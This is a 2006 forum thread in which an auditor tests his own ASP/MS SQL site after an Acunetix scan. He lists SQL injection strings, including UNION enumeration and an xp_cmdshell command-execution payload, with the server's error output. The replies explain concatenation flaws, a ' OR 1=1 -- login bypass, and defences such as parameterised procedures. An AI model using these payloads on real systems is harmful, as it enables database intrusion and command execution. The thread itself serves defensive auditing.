website auditing

My web server has MS SQL at the back-end and ASP at the front-end. A UserID, Password, and a dynamically generated code field are present on the website for the user to log on. The UserID field takes an EMAIL address as input. There are other features in the website such as search and advanced search, cart etc.

At the back-end, stored procedures are used. However, according to the report generated by Acunetix v3.0 the results have been otherwise. A possibility of a successful SQL injection attack has been shown in the report (in the search, advanced search field, Forgot Password fields).

I have tried and worked out injection strings to my understanding and knowledge of this subject. I also studied the report generated by Acunetix with the tested parameters making the site vulnerable. However, the security of the website could not be completely tested with this information.

According to the results I received from Acunetix, pages - Search, Advanced Search, Cart - were susceptible to injection, CSS scripts, parameter manipulation etc. I used the parameters with which Acunetix tested the pages, manually entering them in the respective fields, with no positive results.

I tested the 'Forget Password' option (forgetpassword.asp) on my site with a few strings. Though I couldn't get any deeper, still I was able to gather a little information such as the table name and field names from it. Though the developer team is confident that the db is all safe, I doubt so. Please find below the strings that I tested the page with:

A)
' having 1=1--

Column 'table_name.col_pwd' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/pagename/page1.asp, line 41

B)
' group by table_name.col_username having 1=1--

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'table_name.col_pwd' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/pagename/page1.asp, line 41

C)
' union select count(col_pwd) from table_name--

Microsoft OLE DB Provider for SQL Server error '80040e07'
The sum or average aggregate operation cannot take a varchar data type as an argument.
/pagename/page1.asp, line 41

D)
' union select sum(col_username) from table_name--

Microsoft OLE DB Provider for SQL Server error '80040e07'
The sum or average aggregate operation cannot take a nvarchar data type as an argument.
/pagename/page1.asp, line 41

E)
' OR 1=1-- OR desc table_name;

' OR 1=1-- UNION desc table_name;

Your Pasword has been sent to your Email address.

F)
' union select min(col_username),1,1 from table_name where col_username > 'a'--

Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/pagename/page1.asp, line 41

G)
' union select * from master..sysobjects

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/pagename/page1.asp, line 41

This can be avoided by customizing the errors, though.

Next, I tried these on two pages:

---> '; exec master..xp_cmdshell 'iisreset';-- <---

page1 - Forget password page:

---> \\\'; exec master..xp_cmdshell \\\'iisreset\\\';-- <---
Error: Login id not valid in this section.

page2 - login page:
Incorrect Username or Password

Am I doing it wrong here?

The 'Forgot Password' page takes 'Login ID' as the input. Login ID is in the form of 'Email Address' that we need to enroll with at the time of registration/member creation.

The page gives me the following string in the input text box and the following error string:

\\\'; exec master..xp_cmdshell \\\'\\\'iisreset\\\'\\\';--
Login id is invalid in this section.

The address of this page now (after the error) is http://www.example_site.com/test_page1/help.php?section=Password_Recovery_error&errortype=C&email=+%5C%27%3B+exec+master..xp_cmdshell+%5C%27%5C%27iisreset%5C%27%5C%27%3B--

---

I know that we should use strongly typed variables wherever possible; use stored procs; should keep a check on the length of user submitted strings, maxlength on HTML input boxes; remove the nasty characters.

Please suggest where I am missing here and how I should construct the strings here. The strings suggested by Acunetix don't seem to work on the site.

Thanks.


I don't know if it's test or production. But it's sure from what you have given that it is using dynamic SQL and is prone to injection. Read through this article.
http://www.sommarskog.se/dynamic_sql.html#SQL_injection
Hope this helps.


Ganeshen wrote on Fri, 19 May 2006 05:16:02 -0700:
> My web server has MsSql at the back-end and asp at the front-end. [...]

While the strings themselves do not actually seem to work (i.e. they are causing errors), they are showing that you have a SQL injection risk - it only requires a determined person to try different strings to be able to do something to your data. It appears your problem is due to creating SQL by concatenating strings without validating those strings first, so when there is a ' in them it results in the SQL being changed. E.g. let's say you have a table called Users with logins and passwords, and you're looking for a matching record using the following in ASP (where objRec is an ADO Recordset):

    objRec.Open "SELECT * FROM Users WHERE Login = '" & Request("login") & "' AND Password = '" & Request("password") & "'"

Passing in the form variables directly is a very bad idea.
If someone, say, uses the following string

    ' OR 1=1 --

for the password value, then the resulting SQL would look like this (using the string John for the login):

    SELECT * FROM Users WHERE Login = 'John' AND Password = '' OR 1=1 --'

and now your entire Users table is pulled into the recordset, because the OR 1=1 is a match to every record in the table and the closing ' for the Password value is ignored as it comes after a comment tag, so making the SQL syntactically valid. At best this allows access to the system if the rest of the page just treats a non-empty recordset as having a match. At worst, if the page displays the recordset data (say the developer put a loop in through the recordset in case of more than 1 matching row, although that would be a very silly thing to do) then your entire User table is now displayed in the ASP page - and your "hacker" has pick of account details to login with, and you've got a Data Protection violation on your hands.

The above example is a very simple one, and in a real application should never happen - but it highlights how easy it is to make mistakes when creating SQL dynamically. Check out the link posted by Omnibuzz in the other reply for plenty of info on the basics of SQL injection and what to look for.

Oh, and in the above case, if you have a Stored Procedure taking the 2 values and doing the query, e.g.

    CREATE PROCEDURE CheckUser @login varchar(50), @password varchar(50) AS
    SELECT * FROM Users WHERE Login = @login AND Password = @password

then that password value of ' OR 1=1 --' doesn't have the same effect; it results in the same as the following:

    SELECT * FROM Users WHERE Login = 'John' AND Password = ''' OR 1=1 --'''

where the doubling of the ' inside the string causes the SQL parser to treat it as a string literal, so you won't get a match unless John's password happens to be that string.

A quick and nasty solution to most SQL injection attacks like this is to put a simple Replace in the ASP code to change all single apostrophes into 2, e.g. instead of using Request("login"), use Replace(Request("login"),"'","''"); however this still doesn't close all entry points and a thorough review of all your code is really needed, and try to move all your SQL into Stored Procedures.

Dan
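The concatenation-versus-parameters contrast in Dan's reply, as an added example that is not from the thread: it runs the same Users lookup against an in-memory SQLite table (an assumption standing in for MS SQL Server; the sample accounts are constructed) and shows the ' OR 1=1 -- password matching every row when spliced into the SQL text, and matching nothing when the quotes are doubled or the value is bound as a parameter, which is what the CheckUser procedure does.

```python
"""Added example, not code from the thread.  SQLite stands in for MS SQL
Server (assumption); the '--' comment and quote-doubling behave the same."""
import sqlite3

# Constructed sample accounts; none has the injected string as its password.
SAMPLE_USERS = [("John", "s3cret"), ("alice", "hunter2"), ("bob", "letmein")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Login TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_concatenated_sql(login: str, password: str) -> str:
    """The objRec.Open pattern from the reply: form values spliced into SQL text."""
    return ("SELECT * FROM Users WHERE Login = '" + login
            + "' AND Password = '" + password + "'")


def login_concatenated(conn: sqlite3.Connection, login: str, password: str) -> int:
    """Number of rows the dynamically built query matches."""
    return len(conn.execute(build_concatenated_sql(login, password)).fetchall())


def login_escaped(conn: sqlite3.Connection, login: str, password: str) -> int:
    """Dan's 'quick and nasty' fix: Replace(..., "'", "''") before concatenating.
    The doubled quote keeps the whole value inside the string literal."""
    return login_concatenated(conn, login.replace("'", "''"),
                              password.replace("'", "''"))


def login_parameterised(conn: sqlite3.Connection, login: str, password: str) -> int:
    """Equivalent of the CheckUser stored procedure: the values are bound as
    parameters and are never parsed as SQL, whatever characters they hold."""
    rows = conn.execute(
        "SELECT * FROM Users WHERE Login = ? AND Password = ?", (login, password)
    ).fetchall()
    return len(rows)


def demo() -> dict:
    conn = make_db()
    payload = "' OR 1=1 --"  # the password value discussed in the reply
    return {
        "sql_text": build_concatenated_sql("John", payload),
        "concatenated": login_concatenated(conn, "John", payload),  # whole table
        "escaped": login_escaped(conn, "John", payload),            # no match
        "parameterised": login_parameterised(conn, "John", payload),  # no match
        "genuine": login_parameterised(conn, "John", "s3cret"),     # one match
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```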
"Daniel Crichton" wrote:
> While the strings themselves do not actually seem to work (ie. they are causing errors), they are showing that you have a SQL injection risk [...]

Dan,

(A) Though I am doing black-box on this, I have been able to get the logon authentication code that is being used on our sites (the dev team is using the same authentication code on all our sites!). The code is in JavaScript and is nicely built. However, I believe that in case an attacker locates this hidden directory (with code and other files for the site) - which is not difficult, I feel - he/she can alter the attack accordingly immediately (which is not good).

(B) The dev team is using stored procs; parameters can't be passed through the URL directly; the input text boxes have a limit specified for the input; and for the logon authentication code, only Email ID is taken in the login id field, and unnecessary characters (' / ; etc) have been taken care of. So, I am a little unconfident about anybody being able to break the logon authentication. The points of concern are other pages, as I mentioned earlier, the Forgot Password, Search and Advanced Search pages, and in the near future, cart (maybe X-Cart) would also be going up on the sites. And the dev team is cautious and satirical over this whole thing too.

(C) Does studying ASP vulnerabilities help?

All suggestions and opinions are welcome. Thanks.